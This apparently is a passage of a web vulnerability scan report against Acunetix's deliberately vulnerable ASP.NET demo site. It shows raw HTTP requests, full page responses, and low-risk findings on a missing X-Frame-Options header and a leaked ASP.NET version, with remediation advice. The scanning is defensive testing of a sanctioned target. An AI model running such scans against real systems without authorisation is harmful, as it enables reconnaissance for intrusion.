help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
POST http://testaspnet.vulnweb.com/Signup.aspx
Alert tags Alert description X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.
Request Request line and header section (399 bytes)
POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1098 Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (1098 bytes)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8wYbzXe%2BsXxDpSfVp4SwbIP85RvA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+upResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:19 GMT Content-Length: 13177Response body (13177 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/rVVS1oArBGNWHuMPoCTb1Ib2vQA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Parameter X-Frame-OptionsSolution Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
-
-
-
Risk=低, Confidence=高等的 (29)
-
http://testaspnet.vulnweb.com (29)
-
X-AspNet-Version Response Header (29)
GET http://testaspnet.vulnweb.com
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (211 bytes)
GET http://testaspnet.vulnweb.com HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cacheRequest body (0 bytes)
Response Status line and header section (296 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:16 GMT Content-Length: 13912Response body (13912 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" 